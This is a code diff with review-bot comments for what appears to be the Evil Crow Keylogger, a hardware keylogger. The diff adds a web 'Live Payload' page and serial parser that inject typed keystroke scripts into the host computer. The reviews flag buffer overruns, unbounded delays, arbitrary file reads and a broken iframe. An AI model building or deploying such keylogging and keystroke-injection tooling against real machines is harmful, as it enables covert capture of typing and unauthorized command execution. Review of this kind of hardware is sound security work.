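--- a/README.md
+++ b/README.md
@@ -206,6 +206,30 @@
 
 **File:** log.txt
 
+## Keystroke Injection
+
+Keystroke injection attacks can me executed by navigating to the Live Payload tab. There you can write and run keystroke injection payloads written in simple script.
+
+The parameters allowed to create payloads are the following:
+
+* **print:** Example print Hello World
+
+* **println:** Example println Hello World
+
+* **press:** Example press 131 (This is the GUI key)
+
+* **release:** Example release
+
+* **rawpress:** Example rawpress 176 (This is the RETURN key)
+
+* **delay:** Example delay 3000
+
+To press more keys and modifiers you can use the following link: https://www.arduino.cc/reference/es/language/functions/usb/keyboard/keyboardmodifiers/
+
+**Payload example:**
+
+![Log](https://github.com/joelsernamoreno/EvilCrow-Keylogger/blob/master/images/payload.PNG)
+
 # Unbrick Evil Crow Keylogger with Hall Sensor
 
 First, you’ll need to set the serial port to the bootloader. But that port is only visible when the board is in bootloader mode, so pull the reset line low twice quickly to invoke the bootloader reset feature. You can quickly press the reset button** twice. While the Evil Crow Keylogger is in the bootloader mode, change the ‘Tools > Serial Port’ menu to the bootloader COM port. Quick! You’ve only got eight seconds.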
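--- a/code/ATMEGA32U4/ATMEGA32U4.ino
+++ b/code/ATMEGA32U4/ATMEGA32U4.ino
@@ -29,6 +29,9 @@
 uint8_t modifiers=0;
 uint8_t modifiersard=0;
 int key_modifier;
+String cmd;
+char Command[255];
+String tmp_key;
 
 File SDlog;
 
@@ -62,7 +65,8 @@
 };
 
 void KbdRptParser::OnKeyUp(uint8_t mod, uint8_t key) {
- Keyboard.rawrelease(key, 0);
+ //Keyboard.rawrelease(key, 0);
+ Keyboard.releaseAll();
  SetModifiersArd();
  key_modifier = key|modifiersard,HEX;
  SDlog = SD.open("log.txt", FILE_WRITE);
@@ -81,6 +85,51 @@
  Keyboard.rawpress(key, modifiers);
 }
 
+char ProcessCommand() {
+
+ // Release (example: release)
+ if(cmd.startsWith("release")) {
+ Keyboard.releaseAll();
+ }
+
+ // Println (example: println Hello World)
+ else if(cmd.startsWith("println ")) {
+ cmd.toCharArray(Command, cmd.length() + 1);
+ Keyboard.println(Command + 8);
+ }
+
+ // Print (example: print Hello World)
+ else if(cmd.startsWith("print ")) {
+ cmd.toCharArray(Command, cmd.length() + 1);
+ Keyboard.print(Command + 6);
+ }
+
+ // Press (example: press 131) 131 = KEY_LEFT_GUI
+ else if(cmd.startsWith("press ")) {
+ cmd.toCharArray(Command, cmd.length() + 1);
+ tmp_key = Command + 6;
+ int keytmp = tmp_key.toInt();
+ Keyboard.press(keytmp);
+ delay(100);
+ }
+
+ // RawPress (example: rawpress 131) 131 = KEY_LEFT_GUI
+ else if(cmd.startsWith("rawpress ")) {
+ cmd.toCharArray(Command, cmd.length() + 1);
+ tmp_key = Command + 9;
+ int keytmp = tmp_key.toInt();
+ Keyboard.press(keytmp);
+ delay(100);
+ Keyboard.releaseAll();
+ }
+
+ // Delay (example: delay 2000)
+ else if(cmd.startsWith("delay ")) {
+ cmd.toCharArray(Command, cmd.length() + 1);
+ delay(atoi(Command + 6));
+ }
+}
+
 void KbdRptParser::OnControlKeysChanged(uint8_t before, uint8_t after) {
 
  MODIFIERKEYS beforeMod;
@@ -123,8 +172,10 @@
 KbdRptParser Prs;
 
 void setup() {
- Serial.begin(115200);
- Serial1.begin(115200);
+
+ Serial.begin(38400);
+ Serial1.begin(38400);
+ delay(500);
  SD.begin(5);
 
  #if !defined(__MIPSEL__)
@@ -138,5 +189,11 @@
 
 void loop() {
  Usb.Task();
+
+ while (Serial1.available()) {
+ cmd = Serial1.readStringUntil('\n');
+ delay(500);
+ ProcessCommand();
+ }
 }
 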
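Review bot: `ProcessCommand()` at new line 88 is declared `char` but never returns a value, which is undefined behaviour in C++ once control flows off its closing brace; declare it `void ProcessCommand() {`. The copies at new lines 97, 103, 109, 118 and 128 size the destination by the input, `cmd.toCharArray(Command, cmd.length() + 1)`, so a line of 255 or more characters arriving on Serial1 (the ESP32 forwards web-form text to this port line by line) overruns the 255-byte `Command` buffer; bound it by the buffer instead, `cmd.toCharArray(Command, sizeof(Command));`. `delay(atoi(Command + 6))` at new line 129 accepts any value the sender chooses, so one oversized delay stalls `loop()` and the USB host polling it drives; clamping the parsed value to a sane maximum keeps the device responsive.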
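--- a/code/ESP32/ESP32.ino
+++ b/code/ESP32/ESP32.ino
@@ -4,8 +4,13 @@
 #include <WebServer.h>
 #include <EEPROM.h>
 #include "SPIFFS.h"
+#include "livepayload.h"
 
 String webString;
+char autopayload[64];
+int DelayLength = 1000;
+int livepayloaddelay;
+char local_IPstr[16];
 
 // Config SSID and password
 const char* ssid = "Keylogger"; // Enter your SSID here
@@ -13,7 +18,7 @@
 
 // HTML and CSS style
 const String HTML_CSS_STYLING = "<html><head><meta charset=\"utf-8\"><title>Evil Crow Keylogger</title><style> body { background-color: #333333; font-family: \"Century Gothic\", Arial; color: white; margin: 20px;}.myButton:link, .myButton:visited {background: linear-gradient(#777777, #444444);color: white;padding: 4px;min-width: 100px;border-radius: 5px;border: 2px solid white;text-align: center;margin-right: 20px;text-decoration: none;display: inline-block;transition: 0.25s;} .myButton:hover, .myButton:active {background: linear-gradient(#888888, #555555);border: 2px solid deepskyblue;border-radius: 10px;transform: scale(1.15);}</style></head>";
-const String MENU = "<body><p>Evil Crow Keylogger v1.4</p><div id=\"header\"><div id=\"menu\"><ul><a class=\"myButton\" href=\"/viewlog\">View Log</a><a class=\"myButton\" href=\"/delete\">Delete log</a></ul></div></div></style>";
+const String MENU = "<body><p>Evil Crow Keylogger v1.5</p><div id=\"header\"><div id=\"menu\"><ul><a class=\"myButton\" href=\"/\">Menu</a><a class=\"myButton\" href=\"/livepayload\">Live Payload</a><a class=\"myButton\" href=\"/viewlog\">View Log</a><a class=\"myButton\" href=\"/delete\">Delete log</a></ul></div></div></style>";
 
 // File
 File logs;
@@ -23,8 +28,35 @@
 
 const bool formatOnFail = true;
 
+void runpayload() {
+ File f = SPIFFS.open(autopayload, "r");
+ int defaultdelay = DelayLength;
+ int settingsdefaultdelay = DelayLength;
+ int custom_delay;
+ delay(livepayloaddelay);
+ while(f.available()) {
+ String line = f.readStringUntil('\n');
+ line.replace("&lt;", "<");
+
+ String fullkeys = line;
+ int str_len = fullkeys.length()+1;
+ char keyarray[str_len];
+ fullkeys.toCharArray(keyarray, str_len);
+
+ char *i;
+ String cmd;
+ String cmdinput;
+ cmd = String(strtok_r(keyarray," ",&i));
+
+ delay(DelayLength);
+ DelayLength = defaultdelay;
+ }
+ f.close();
+ DelayLength = settingsdefaultdelay;
+}
+
 void setup() {
- Serial.begin(115200);
+ Serial.begin(38400);
  delay(500);
  WiFi.mode(WIFI_AP);
  WiFi.softAP(ssid, password);
@@ -36,6 +68,61 @@
 
  server.on("/", []() {
  server.send(200, "text/html", HTML_CSS_STYLING + MENU);
+ });
+
+ server.on("/livepayload", []() {
+ server.send_P(200, "text/html", LivePayload);
+ });
+
+ server.on("/runlivepayload", [](){
+ String livepayload;
+ livepayload += server.arg("livepayload");
+ if (server.hasArg("livepayloadpresent")) {
+ //server.send(200, "text/html", "<pre>Running live payload: <br>"+livepayload+"</pre>");
+ char* splitlines;
+ int payloadlen = livepayload.length()+1;
+ char request[payloadlen];
+ livepayload.toCharArray(request,payloadlen);
+ splitlines = strtok(request,"\r\n");
+ int defaultdelay = DelayLength;
+ int settingsdefaultdelay = DelayLength;
+ int custom_delay;
+ delay(livepayloaddelay);
+ while(splitlines != NULL)
+ {
+ String liveline=splitlines;
+ liveline.replace("&lt;", "<");
+ char *i;
+ String cmd;
+ String cmdinput;
+ cmd = String(strtok_r(splitlines," ",&i));
+
+ splitlines = strtok(NULL,"\r\n");
+
+ Serial.println(liveline);
+
+ delay(DelayLength);
+ DelayLength = defaultdelay;
+ }
+ DelayLength = settingsdefaultdelay;
+ return 0;
+ }
+ else {
+ server.send(200, "text/html", F("Type or Paste a payload and click \"Run Payload\"."));
+ }
+ });
+
+ server.on("/dopayload", [](){
+ String dopayload;
+ dopayload += server.arg(0);
+ server.send(200, "text/html", HTML_CSS_STYLING + "<pre><h3>Running payload: "+dopayload+"</h3></pre><br></body></html>");
+ File f = SPIFFS.open(dopayload, "r");
+ while(f.available()) {
+ String line = f.readStringUntil('\n');
+ Serial.println(line);
+ delay(DelayLength); //delay between lines in payload, I found running it slower works best
+ }
+ f.close();
  });
 
  server.on("/viewlog", [](){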
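Review bot: The `/runlivepayload` handler's success branch (new lines 80–109) never answers the request — the only `server.send` in it is commented out — and it ends with `return 0;` while the `else` branch returns nothing, so the lambda's return type is deduced as `int` and the `else` path flows off the end without a value. Replace `return 0;` with a response such as `server.send(200, "text/plain", F("OK"));` so the iframe request completes and both branches return consistently. `/dopayload` (new line 119) passes `server.arg(0)` straight to `SPIFFS.open(dopayload, "r")` as a path and never tests whether `f` opened; a `if (!f) { server.send(404, "text/plain", F("No such payload")); return; }` guard, plus a check that the name is one of the expected payload files, would stop arbitrary SPIFFS paths from being read and replayed over Serial. `char request[payloadlen]` at new line 84 is a stack VLA sized by the POST body, so a large payload can exhaust the HTTP task's stack; capping the length before the copy, or splitting the `String` directly, avoids that. The locals `cmd`, `cmdinput` and `custom_delay` in both `runpayload()` and the live handler are assigned and never read, which looks like unfinished parsing; a `// TODO` saying what they are for, or their removal, would help the next reader.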
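--- /dev/null
+++ b/code/ESP32/livepayload.h
@@ -0,0 +1,87 @@
+const char LivePayload[] PROGMEM = R"=====(
+<!DOCTYPE HTML>
+<html>
+<head>
+ <title>BadUsb_PControl</title>
+ <meta charset="utf-8">
+ <style>
+ body {
+ background-color: #333333;
+ font-family: "Century Gothic", Arial;
+ color: white;
+ margin: 20px;
+ }
+ .myButton:link, .myButton:visited {
+ background: linear-gradient(#777777, #444444);
+ color: white;
+ padding: 4px;
+ min-width: 100px;
+ border-radius: 5px;
+ border: 2px solid white;
+ text-align: center;
+ margin-right: 20px;
+ text-decoration: none;
+ display: inline-block;
+ transition: 0.25s;
+ }
+ .myButton:hover, .myButton:active {
+ background: linear-gradient(#888888, #555555);
+ border: 2px solid deepskyblue;
+ border-radius: 10px;
+ transform:scale(1.15);
+ }
+ .submitBtn {
+ background: linear-gradient(#777777, #444444);
+ color: white;
+ padding: 4px;
+ min-width: 100px;
+ border-radius: 2.5px;
+ border: 2px solid white;
+ text-align: center;
+ transition: 0.25s;
+ }
+ .submitBtn:hover, .submitBtn:active {
+ background: linear-gradient(#888888, #555555);
+ border: 2px solid deepskyblue;
+ }
+ .console{
+ width: 99%;
+ background-color: black;
+ color: white;
+ font-family: monospace;
+ padding: 5px;
+ border: 0px;
+ }
+ </style>
+</head>
+<body>
+<center>
+<div id="header">
+ <div id="menu">
+ <ul>
+ <a class="myButton" href="/">Menu</a>
+ <a class="myButton" href="/livepayload">Live Payload</a>
+ <a class="myButton" href="/uploadpayload">Upload Payload</a>
+ <a class="myButton" href="/viewlog">View Log</a>
+ <a class="myButton" href="/delete">Delete Log</a>
+ </ul>
+ </div>
+</div>
+<hr>
+</center>
+<br>
+<FORM action="/runlivepayload" method="post" id="live" target="iframe">Payload: <br><br>
+ <textarea class="console" form="live" rows="4" cols="50" name="livepayload"></textarea>
+ <br>
+ <br>
+ <INPUT type="radio" name="livepayloadpresent" value="1" hidden="1" checked="checked">
+ <INPUT class="submitBtn" type="submit" value="Run Payload">
+</form>
+<br>
+<hr>
+<br>
+<iframe style="visibility: hidden;" src="http://" )+local_IPstr+"/runlivepayload" name="iframe"></iframe>
+</body>
+</html>
+)=====";
+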
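Review bot: The iframe on line 83 sits inside the `R"=====(` raw string literal, so the text `" )+local_IPstr+"` is sent to the browser verbatim instead of being concatenated with the ESP32's address, and the resulting `src` is not a usable URL. The page is served by the same host that handles `/runlivepayload`, so a relative target works without any string splicing: `<iframe style="visibility: hidden;" src="/runlivepayload" name="iframe"></iframe>`; with that change `local_IPstr` in ESP32.ino may no longer be needed. The menu also links `/uploadpayload` (line 64), and no handler for that route appears in the ESP32.ino hunks of this commit, so it may be a dead link unless it is registered in code outside the diff.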
  • images/payload.PNG